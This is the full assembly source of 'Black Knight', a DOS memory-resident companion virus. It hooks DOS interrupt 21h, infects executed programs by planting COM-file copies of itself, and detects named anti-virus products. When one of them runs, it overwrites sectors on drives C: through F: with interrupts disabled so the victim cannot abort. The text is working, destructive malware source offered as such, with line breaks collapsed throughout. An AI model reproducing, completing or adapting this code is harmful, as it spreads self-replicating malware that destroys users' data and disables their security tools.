;Black Knight Anti-Virus-Virus;Size - 520;;Tasm BKNIGHT;Tlink /T BKNIGHT;Memory Resident Companion Virus;Anti-Anti-Virus ;Formats Drives C: to F: When Anti-Virus Product Is Ran;Tempest - _ Of Luxenburg; .radix 16 cseg segment model small assume cs:cseg, ds:cseg, es:cseg org 100hoi21 equ enditfilelength equ endit - beginnameptr equ endit+4DTA equ endit+8 begin: jmp virus_install virus_name: db 'Black Knight' ;installvirus_install: nop nop nop mov ax,cs ; reduce memory size dec ax mov ds,ax cmp byte ptr ds:[0000],5a jne cancel mov ax,ds:[0003] sub ax,100 mov ds:0003,axZopy_virus: mov bx,ax ; copy to claimed block mov ax,es add ax,bx mov es,ax mov cx,offset endit - begin mov ax,ds inc ax mov ds,ax lea si,ds:[begin] lea di,es:0100 rep movsb Grab_21: mov ds,cx ; hook int 21h mov si,0084h ; mov di,offset oi21 mov dx,offset check_exec lodsw cmp ax,dx ; je cancel ; exit, if already installed stosw movsw push es pop ds mov ax,2521h ; revector int 21h to virus nop int 21h nop cancel: ret check_exec: pushf push es ; push everything onto the push ds ; stack push ax push bx push dx cmp ax,04B00h ; is the file being jne abort ; executed? ;if yes, try the_stingerdo_infect: call infect ; then try to infect abort: ; restore everything pop dx pop bx pop ax pop ds pop es popfBye_Bye: ; exit jmp dword ptr cs:[oi21] new_24h: mov al,3 ; critical error handler iretinfect: mov cs:[name_seg],ds ; here, the virus essentially mov cs:[name_off],dx ; copies the name of the cld ; loaded file into a buffer mov di,dx ; so that it can be compared push ds ; against the default names pop es ; in the_stinger mov al,'.' ; subroutine repne scasb ; <-- call the_stinger ; check for anti-virus load ; and deploy the_stinger cld mov word ptr cs:[nameptr],dx mov word ptr cs:[nameptr+2],ds mov ah,2Fh int 21h push es push bx push cs pop ds mov dx,offset DTA mov ah,1Ah int 21h call searchpoint push di mov si,offset COM_txt mov cx,3 rep cmpsb pop di jz do_com mov si,offset EXE_txt nop mov cl,3 rep cmpsb jnz returndo_exe: mov si,offset COM_txt nop call change_ext mov ax,3300h nop int 21h push dx cwd inc ax push ax int 21hGrab24h: mov ax,3524h int 21h push bx push es push cs pop ds mov dx,offset new_24h mov ah,25h push ax int 21h lds dx,dword ptr [nameptr] ;create the virus (unique name) xor cx,cx mov ah,05Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,filelength ;cx= length of virus mov dx,offset begin ;where to start copying mov ah,40h ;write the virus to the int 21h ;new file mov ah,3Eh ; close int 21hreturn1: pop ax pop ds pop dx int 21h pop ax pop dx int 21h mov si,offset EXE_txt call change_ext return: mov ah,1Ah pop dx pop ds int 21H retdo_com: call findfirst cmp word ptr cs:[DTA+1Ah],endit - begin jne return mov si,offset EXE_txt call change_ext call findfirst jnc return mov si,offset COM_txt call change_ext jmp short returnsearchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,0 repnz scasb sub di,4 retchange_ext: call searchpoint push cs pop ds movsw movsw retfindfirst: lds dx,dword ptr [nameptr] mov cl,27h mov ah,4Eh int 21h ret the_stinger: cmp word ptr es:[di-3],'MI' ;Integrity Master je jumptoass cmp word ptr es:[di-3],'XR' ;VIRX je jumptoass cmp word ptr es:[di-3],'PO' ;VIRUSTOP jne next1 cmp word ptr es:[di-5],'TS' je jumptoass next1: cmp word ptr es:[di-3],'VA' ;AV = CPAV je jumptoass cmp word ptr es:[di-3],'TO' ;*prot = F-prot jne next2 cmp word ptr es:[di-5],'RP' je jumptoass next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan. jne next3 cmp word ptr es:[di-5],'CS' je jumptoass cmp word ptr es:[di-3],'NA' ;*lean = McAfee's CLEAN. jne next3 ; why not, eh? cmp word ptr es:[di-5],'EL' je jumptoass next3: ret jumptoass: jmp nuke ;assassination (deletion) ; of anti-virus program nuke: mov al,2 ;Lets Total The C: Drive mov cx,25 cli ; Keeps Victim From Aborting cwd int 026h sti mov al,3 ;Lets Total The D: Drive mov cx,25 cli ; Keeps Victim From Aborting cwd int 026h sti mov al,3 ;Lets Total The E: Drive mov cx,25 cli ; Keeps Victim From Aborting cwd int 026h sti mov al,5 ;Lets Total The F: Drive mov cx,25 cli ; Keeps Victim From Aborting cwd int 026h sti EXE_txt db 'EXE',0COM_txt db 'COM',0 data_1 db 0data_2 db 0last db 090Hname_seg dw ?name_off dw ?c1 db 0 c2 db 0 c3 db 0 c4 db 0 c5 db 0 virus_man: db 'Tempest - _ Of Luxenburg' endit:cseg ends end begin
